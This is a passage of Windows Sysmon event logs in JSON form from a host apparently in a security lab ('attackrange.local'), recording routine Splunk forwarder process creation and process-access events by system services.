{"EventTime":"2020-08-01 07:55:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3729,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:36.175\r\nProcessGuid: {41C8662E-1FF8-5F25-0000-0010A1A50500}\r\nProcessId: 4224\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\powershell2.cmd\" --scheme\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:55:36.175","ProcessGuid":"{41C8662E-1FF8-5F25-0000-0010A1A50500}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\powershell2.cmd\" --scheme\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:55:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3730,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:36.174\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 4472\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-1FF0-5F25-0000-001050430500}\r\nTargetProcessId: 4224\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:36.174","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"4472","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-1FF0-5F25-0000-001050430500}","TargetProcessId":"4224","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3731,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:36.174\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1FF0-5F25-0000-001050430500}\r\nTargetProcessId: 4224\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:36.174","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1FF0-5F25-0000-001050430500}","TargetProcessId":"4224","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:55:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3732,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:36.174\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:36.174","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3733,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:36.174\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:36.174","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3734,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:36.174\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:36.174","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3735,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:36.174\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:36.174","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3736,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:36.174\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:36.174","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3737,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:36.174\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 